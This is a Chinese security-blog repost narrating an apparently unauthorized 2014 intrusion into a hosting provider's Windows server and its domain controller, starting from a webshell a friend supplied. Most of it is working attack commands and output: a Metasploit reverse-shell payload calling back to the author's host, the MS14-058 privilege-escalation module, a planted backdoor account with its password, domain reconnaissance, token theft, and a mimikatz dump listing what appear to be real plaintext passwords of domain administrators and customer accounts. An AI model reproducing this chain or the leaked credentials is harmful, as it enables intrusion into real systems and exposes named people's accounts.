记一次MS14-058到域控实战记录

admin
admin
admin
102213
文章
87
评论
2021年4月18日00:00:50评论132 views字数 10946阅读36分29秒阅读模式
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。


0x01 前言

Date/time:2014年,这个网站权限是朋友给我的,叫帮忙给看下提权,没去细看他是通过什么漏洞拿到的这个网站权限。在拿到权限以后大致看了下:
wscript.shell组件没被禁用,可直接执行系统命令,支持Aspx脚本,系统补丁658+,不允许跨站,搜集到的目标基本信息如下。

基本信息探测:
端口开放:21、80、135、443、445、3306、3392补丁情况:658+补丁( Win2003 32位系统 )脚本探测:支持Asp,Aspx脚本,不支持Php脚本磁盘权限:C,D盘部分文件夹有可读/写权限(不允许跨站)
记一次MS14-058到域控实战记录


注:除了MySQL没有其他可利用第三方软件,因为安全权限设置的原因也不能跨到MySQL目录,所以暂时无法利用MySQL UDF进行提权。

0x02 实战测试过程

补丁打了600+,明知道成功机率不大,但还是硬着头皮把常用的和以前测试成功过的提权EXP全传上去试了个遍,有一部分提权EXP还没来得及整理编号。
pr.exeChurrasco.exe,2003.exeNDProxy.exeiis6.exeMS11-046.exeMS10-048.exeMS11-080.exeMS13-051.exedebug.exe

除了最后测试的MS14-058.exe成功,其它全都失败了,虽然MS14-058成功利用,但是在测试中发现只能执行whoami,其它命令或者.bat、.vbs等文件在执行后都没有回显。
记一次MS14-058到域控实战记录

正是因为如此,我们不得不尝试使用Metasploit进行提权,否则还真没有什么提权思路了。生成个攻击载荷(Msf基础知识在前面已经讲了很多了,不再重复讲了),反弹得到Meterpreter会话。
root@c2unix:~# msfpayload windows/meterpreter/reverse_tcp LHOST=1x3.2x1.x0.1x8 LPORT=443 R | msfencode -t aspx -o /media/sf_Temp/test.aspx
root@c2unix:~# msfconsole -qmsf > use exploit/multi/handlermsf exploit(handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(handler) > set lhost 192.168.1.10msf exploit(handler) > set lport 443msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.10:443[*] Starting the payload handler...[*] Sending stage (770048 bytes) to 216.**.***.9[*] Meterpreter session 1 opened (192.168.1.10:443 -> 216.**.***.9:2159) at 2014-12-29 04:11:44 +0800
记一次MS14-058到域控实战记录

查看当前会话权限、系统信息,尝试使用getsystem提权,没有成功,将当前会话放置后台运行,继续加载ms14_058_track_popup_menu提权模块进行测试。
meterpreter > getuidServer username: TRESSAIWPD_194(lobom0)meterpreter > getsystem[-] priv_elevate_getsystem: Operation failed: Access is denied.meterpreter > sysinfoComputer        : TRESSAOS              : Windows .NET Server (Build 3790, Service Pack 2).Architecture    : x86System Language : en_USMeterpreter     : x86/win32meterpreter > background[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/ms14_058_track_popup_menumsf exploit(ms14_058_track_popup_menu) > set payload windows/meterpreter/reverse_tcpmsf exploit(ms14_058_track_popup_menu) > set lhost 1x3.2x1.x0.1x8msf exploit(ms14_058_track_popup_menu) > set lport 443msf exploit(ms14_058_track_popup_menu) > set session 1msf exploit(ms14_058_track_popup_menu) > exploit
[-] Handler failed to bind to 1x3.2x1.x0.1x8:443[*] Started reverse handler on 0.0.0.0:443[*] Launching notepad to host the exploit...[+] Process 84492 launched.[*] Reflectively injecting the exploit DLL into 84492...[*] Injecting exploit into 84492...[*] Exploit injected. Injecting payload into 84492...[*] Payload injected. Executing exploit...[*] Sending stage (770048 bytes) to 216.**.***.9[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.[*] Meterpreter session 2 opened (192.168.1.10:443 -> 216.**.***.9:3037) at 2014-12-29 04:16:29 +0800
记一次MS14-058到域控实战记录
记一次MS14-058到域控实战记录

注:如果该提权模块显示利用成功,但并没有得到Metpreter会话,这可能是因为目标服务器上安装了诸如安全狗、麦咖啡或者什么其它的安全防护软件,以前多次遇到过这种情况,缺图。

msf exploit(ms14_058_track_popup_menu) > exploit 
[-] Handler failed to bind to 1x3.2x1.x0.1x8:443[*] Started reverse handler on 0.0.0.0:443[*] Launching notepad to host the exploit...[+] Process 84492 launched.[*] Reflectively injecting the exploit DLL into 84492...[*] Injecting exploit into 84492...[*] Exploit injected. Injecting payload into 84492...[*] Payload injected. Executing exploit...[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.[*] Exploit completed, but no session was created

再次通过getuid命令查询当前权限时发现已经是“NT AUTHORITYSYSTEM”权限了,然后将当前会话进程迁移至PID为2796进程中,缺图。

meterpreter > getuidServer username: NT AUTHORITYSYSTEMmeterpreter > ps PID    PPID   Name                   Arch  Session     User                       Path ---    ----   ----                   ----  -------     ----                       ----... 2796   580    searchindexer.exe      x86   0           NT AUTHORITYSYSTEM        C:WINDOWSsystem32SearchIndexer.exe 67360  40764  notepad.exe            x86   0           NT AUTHORITYSYSTEM        C:WINDOWSsystem32notepad.exe...
meterpreter > migrate 2796[*] Migrating from 67360 to 2796...[*] Migration completed successfully.

使用ipconfig命令查看当前目标主机上的IP信息时发现有两张网卡,一个是172.16.19.152内网的,一个是多IP(216.**.***.9/64.**.***.229/209.200.***.***)公网的,缺图。
meterpreter > ipconfig
Interface  1============Name         : MS TCP Loopback interfaceHardware MAC : 00:00:00:00:00:00MTU          : 1520IPv4 Address : 127.0.0.1
Interface 65539============Name         : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #2 - Packet Scheduler MiniportHardware MAC : 84:2b:2b:6b:45:11MTU          : 1500IPv4 Address : 172.16.19.152IPv4 Netmask : 255.255.252.0
Interface 65540============Name         : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #3 - Packet Scheduler MiniportHardware MAC : 84:2b:2b:6b:45:0fMTU          : 1500IPv4 Address : 216.***.***.9IPv4 Netmask : 255.255.255.0IPv4 Address : 64.**.***.229IPv4 Netmask : 255.255.255.0IPv4 Address : 209.200.***.***IPv4 Netmask : 255.255.255.0IPv4 Address : 209.200.***.***IPv4 Netmask : 255.255.255.0IPv4 Address : 209.200.***.***IPv4 Netmask : 255.255.255.0IPv4 Address : 216.**.***.113IPv4 Netmask : 255.255.255.0IPv4 Address : 209.200.***.***IPv4 Netmask : 255.255.255.0IPv4 Address : 209.200.***.***IPv4 Netmask : 255.255.255.0

这里我们先用Metasploit中的enable_support_account模块在系统中留一个后门帐户,也可以用hashdump、mimikatz等命令获取目标主机的哈希和明文密码,缺图。

  • User:SUPPORT_388945a0

  • Pass:7a57a5a743894a0e

msf exploit(ms14_058_track_popup_menu) > use post/windows/manage/enable_support_accountmsf post(enable_support_account) > set password 7a57a5a743894a0emsf post(enable_support_account) > set session 2msf post(enable_support_account) > exploit[*] Target OS is Windows .NET Server (Build 3790, Service Pack 2).[*] Harvesting users...[+] Found SUPPORT_388945a0 account![*] Target RID is 1004[*] Account is disabled, activating...[*] Swapping RIDs...![*] Setting password to 7a57a5a743894a0e[*] Post module execution completed

用于远程桌面连接的3389端口被管理员修改过了,根据经验猜测3392应该是修改后的端口号,在远程连接界面看到存在域,说明这台机器在HOSTING域内。

Webshell执行域信息搜集相关命令时会提示:System error 5 has occurred . Access is denied . 。访问被拒绝,权限问题。
ipconfig /all              //网卡配置信息,所属域以及IP段ping backbox               //显示该机器名的IPnet view                   //显示当前域中的计算机列表net view /domain           //查看有多少个域net user /domain           //获取所有域用户列表net group /domain                     //获取域用户组信息net group "domain admins" /domain     //获取当前域管理员net time /domain                      //域服务器一般也做时间服务器dsquery server                        //查看域控服务器dsquery subnet                        //查看域IP地址范围

记一次MS14-058到域控实战记录


因为meterpreter会话2里已经是SYSTEM权限了,所以可以用shell命令进入DOS命令行下执行以下命令搜集域信息,缺图。
msf post(enable_support_account) > sessions -i 2[*] Starting interaction with 2...
meterpreter > shellProcess 13204 created.Channel 2 created.Microsoft Windows [Version 5.2.3790](C) Copyright 1985-2003 Microsoft Corp.
c:windowssystem32inetsrv>net group "domain admins" /domainnet group "domain admins" /domainThe request will be processed at a domain controller for domain hosting.lunarpages.com.
Group name     Domain AdminsComment        Designated administrators of the domain
Members-------------------------------------------------------------------------------_new_win_user            abbas.khan               akumaralexb                    alext                    brianldgreathouse              dimitriosk               epakgcager                   gudiyak                  iismonJassi                    jayraju                  jmicklelunarscripts             mike                     mwaqasrichardd                 robotdoggy               rodbTsinternetuser           vartamonov               vlaszlozafrilThe command completed successfully.

使用dsquery server命令查询域控制器中有一个PHART,在域信息搜集时也发现HOSTING域内有一台计算机名为PHART的机器,所以这台机器应该是域控服务器,对应的IP地址为:172.16.17.208
c:windowssystem32inetsrv>dsquery server"CN=THART,CN=Servers,CN=Sandiego,CN=Sites,CN=Configuration,DC=hosting,DC=lunarpages,DC=com""CN=PHART,CN=Servers,CN=Sandiego,CN=Sites,CN=Configuration,DC=hosting,DC=lunarpages,DC=com"

====== Domain:HOSTING(域内机器)======
\ARCTURUS = [172.16.17.176]\BASH = [172.16.17.197]\BLAMO = [172.16.17.112]\CASTOR = [172.16.19.62]\CELANEO = [172.16.17.221]\CEPHEI = [172.16.17.177]\INDUS = [172.16.18.30]\KENDAL-NEW = [172.16.16.55]\KRAZ = [216.***.***.207]\PHART = [172.16.17.208]\RAPTOR = [172.16.17.199]\REGOR = [216.***.***.206]\ROCKET = [172.16.16.120]\SM-MAIL2-N14 = [172.16.19.129]\SMARTERMAIL1 = [172.16.16.129]\TRESSA = [216.**.***.9]\TUB = [172.16.19.72]\VOGA = [67.***.***.33]\VPSSQL12 = [172.16.18.169]\YED = [216.***.***.203]

加载incognito扩展,它可以用来盗窃目标主机令牌和假冒用户,列出目标主机可用令牌,可以看到有2个域管帐号:HOSTINGdimitriosk,HOSTINGrichardd。

meterpreter > use incognitoiLoading extension incognito...success.meterpreter > list_tokens -u
Delegation Tokens Available========================================NT AUTHORITYLOCAL SERVICENT AUTHORITYNETWORK SERVICENT AUTHORITYSYSTEMTRESSAcodeb7TRESSAIWAM_plesk(default)TRESSAIWPC_10(techb7)TRESSAIWPC_112(techn56)TRESSAIWPC_120(csbelts2)......Impersonation Tokens Available========================================HOSTINGdimitrioskHOSTINGricharddNT AUTHORITYANONYMOUS LOGONTRESSAIUSR_baffledcomics23TRESSAIUSR_bridgcaTRESSAIUSR_canva4TRESSAIUSR_cellu12......


接着我们使用mimikatz法国神器直接就能获取到了这2个域管帐号的明文密码,缺图。

meterpreter > wdigest[+] Running as SYSTEM[*] Retrieving wdigest credentialswdigest credentials===================
AuthID      Package    Domain        User                  Password------      -------    ------        ----                  --------0;997       Negotiate  NT AUTHORITY  LOCAL SERVICE0;54487     NTLM0;141544    NTLM       TRESSA        IWPD_323(jielu0)      1pDH40;146820    NTLM       TRESSA        IWPD_276(codeb7)      2FRj#0;150429    NTLM       TRESSA        psaadm                2a 00 6d 00 48 00 6a 00 40 bc0;146362    NTLM       TRESSA        IWPD_73(birch11)      2a)hx0;145281    NTLM       TRESSA        IWPD_404(apsns0)      2i!@!0;999       Negotiate  HOSTING       TRESSA$               37 9f 4f db ad 52 cf a4 1b 0e f7 c0 33 ad 6c 6a f9 5a 21 aa 57 e3 33 42 b7 2a b3 520;996       Negotiate  NT AUTHORITY  NETWORK SERVICE       37 9f 4f db ad 52 cf a4 1b 0e f7 c0 33 ad 6c 6a f9 5a 21 aa 57 e3 33 42 b7 2a b3 520;143168    NTLM       TRESSA        IWPD_130(leopo1)      A^Xku0;150476    NTLM       TRESSA        IWPD_390(myp3n0)      AehD80;50614744  Kerberos   HOSTING       richardd              B0unc3d0;87605279  Kerberos   HOSTING       richardd              B0unc3d0;143575    NTLM       TRESSA        IWPD_231(rmhar0)      BARrc0;150196    NTLM       TRESSA        IWPC_184(e2esoft0)    C9rFi0;1669440   NTLM       TRESSA        Plesk Administrator   HOB.5Sd3X88C610rxYL/06.U0UbihUoU0;148004    NTLM       TRESSA        IWPD_413(manuf5)      I1)cd0;147957    NTLM       TRESSA        IWPD_375(cellu12)     I6oS)0;63839802  Kerberos   HOSTING       dimitriosk            TsAk1553!@#0;56964817  Kerberos   HOSTING       dimitriosk            TsAk1553!@#0;143880    NTLM       TRESSA        IWPD_179(ringb2)      U&RQo0;144397    NTLM       TRESSA        IWPD_427(temp02)      Uj$Da0;49263709  NTLM       TRESSA        SvcCWRSYNC            XgXS0fJkki11200;49609545  NTLM       TRESSA        SvcCWRSYNC            XgXS0fJkki11200;147191    NTLM       TRESSA        IWPD_334(egorov0)     agA+L0;147850    NTLM       TRESSA        IWPD_399(smash11)     btj#c0;82470376  NTLM       TRESSA        codeb7                codebroker10;145375    NTLM       TRESSA        IWPD_48(obser14)      d(nlK0;144068    NTLM       TRESSA        IWPD_302(donas0)      d-1!j0;56760168  NTLM       TRESSA        robotdoggy            xhn?O8kx!K0;87616530  NTLM       TRESSA        robotdoggy            xhn?O8kx!K0;149472    NTLM       TRESSA        IWPD_290(expos12)     xula)0;147761    NTLM       TRESSA        IWPD_417(marig4)      yy=^(......

域控服务器的IP地址、帐号密码都到手了,接下来就是使用meterpreter的portfwd命令进行端口转发并连接进入域控服务器就行了,域控服务器的远程桌面连接端口也改为了3392。

这里笔者在测试时是可以成功登录到域控服务器及域控下的所有机器,这里就不再截图了。
meterpreter > portfwd add -l 1234 -r 172.16.17.208 -p 3392[*] Local TCP relay created: 0.0.0.0:1234 <-> 172.16.17.208:3392
meterpreter > portfwd delete -l 1234        //删除

0x03 一处问题测试

原笔者想直接通过Metasploit下的exploit/windows/smb/psexec模块使用其中一个域管理员进行批量登录测试的,但是在测试过程中发现总是会出现 以下报错信息。
msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.1.10:443[*] Connecting to the server...[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (172.16.17.208:445).

记一次MS14-058到域控实战记录


通过在本地2008虚拟机中测试发现,开启Windows防火墙时使用psexec模块返回的就是这个报错。用DOS命令(net stop "Windows Firewall")停止防火墙服务依旧提示一样的报错,但将Windows防火墙关闭后即可成功得到会话,重新启用防火墙后又会断开会话 ~.~ 。
msf exploit(handler) > use exploit/windows/smb/psexecmsf exploit(psexec) > set payload windows/meterpreter/bind_tcpmsf exploit(psexec) > set SMBUSER administratormsf exploit(psexec) > set SMBPASS windows****!@#123msf exploit(psexec) > set RHOST 192.168.1.9msf exploit(psexec) > set LPORT 4444msf exploit(psexec) > exploit
[*] Started bind handler[*] Connecting to the server...[*] Authenticating to 192.168.1.9:445|WORKGROUP as user 'administrator'...[*] Uploading payload...[*] Created TFPRuonH.exe...[+] 192.168.1.9:445 - Service started successfully...[*] Deleting TFPRuonH.exe...[*] Sending stage (770048 bytes) to 192.168.1.9[*] Meterpreter session 6 opened (192.168.1.10:60880 -> 192.168.1.9:4444) at 2014-12-29 20:12:56 +0800
记一次MS14-058到域控实战记录
记一次MS14-058到域控实战记录

本文始发于微信公众号(渗透攻击红队):记一次MS14-058到域控实战记录

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月18日00:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次MS14-058到域控实战记录https://cn-sec.com/archives/337546.html

发表评论

匿名网友 填写信息